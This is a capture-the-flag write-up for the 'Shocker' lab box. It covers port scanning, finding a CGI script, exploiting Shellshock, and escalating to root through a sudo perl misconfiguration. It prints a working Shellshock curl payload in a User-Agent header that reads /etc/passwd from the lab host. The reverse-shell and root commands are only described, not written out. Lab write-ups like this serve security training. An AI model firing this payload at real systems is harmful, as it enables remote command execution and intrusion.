Shocker

Overview

Initial Foothold : Shellshock Vulnerability

Privilege Escalation : Access misconfiguration

Enumeration

Start with port scanning

Port Scanning

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 was open and running webserver

Lets visit the webpage

Got some hint from name and picture that there may be shellshock vulnerability

If you want to learn more about shellshock vulnerability just google the name you will find tons of writeups for this

After running dirbuster we only got /cgi-bin/ directory

Start dirbuster scan in this directory with extension php,sh,rb

Got one file name user.sh lets visit the page

It started downloading the file

This confirms that there is a file in cgi-bin directory which we can access

Thats all required for exploiting shellshock vulnerability

Exploitation

Lets start exploitation of shellshock vulnerability

Will use curl for execution of cmds on the site

First get the content of /etc/passwd from the target webserver

Run the following command

curl -H 'user-agent: () { :; }; echo; echo; /bin/bash -c "cat /etc/passwd" ' http://10.10.10.56/cgi-bin/user.sh

Got the content of /etc/passwd file

Lets try to get reverse shell using the same

Run the following command and setup listener using netcat

Got the reverse shell back as shelly user

Privilege Escalation

Simply run sudo -l command

Here we can see that we can perl as root user

Lets see in gtfobins if we can escalate privileges using perl command

perl | GTFOBinsgtfobins.github.io

and we got

Using above command we can escalate to root user

That's all for this box

Good Bye :)